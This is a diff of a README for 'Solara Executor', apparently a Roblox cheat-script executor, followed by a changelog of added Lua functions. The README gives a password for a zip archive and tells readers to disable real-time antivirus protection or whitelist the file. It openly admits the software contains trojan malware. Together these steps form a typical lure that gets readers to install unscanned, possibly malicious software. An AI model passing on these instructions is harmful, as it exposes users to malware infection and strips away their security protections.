Samuel-Belay/SolaraExecutor/README.md

 # PASS:1234
 # ADD ZIP TO YOUR DESKTOP

-SOLARA [BETA] EXECUTOR!
+# SOLARA [BETA] EXECUTOR!
-REMEMBER TO TURN OFF REAL TIME PROTECTION WHEN EXECUTING OR RUNNING SOLARA Solara contains torjan malware to inject into the game, so turn off antivirus or just whitelist the file you put it in
+# REMEMBER TO TURN OFF REAL TIME PROTECTION WHEN EXECUTING OR RUNNING SOLARA
+# Solara contains trojan malware to inject into the game, so turn off antivirus or just whitelist the file you put it in

 Changelog:

 5/29: Fixed appendfile Added lz4compress, lz4decompress Added debug.getinfo Added debug.getmetatable / getrawmetatable (watered down version) Added isnetworkowner Added isscriptable Added setsimulationradius Added isexecutorclosure Added getcallingscript Added a more functional cloneref Fixed compareinstances Reverted fireclickdetector (should work now) Loadstring now returns compiler errors semi correctly, and no longer errors in console Loadstring now takes a chunkName Added islclosure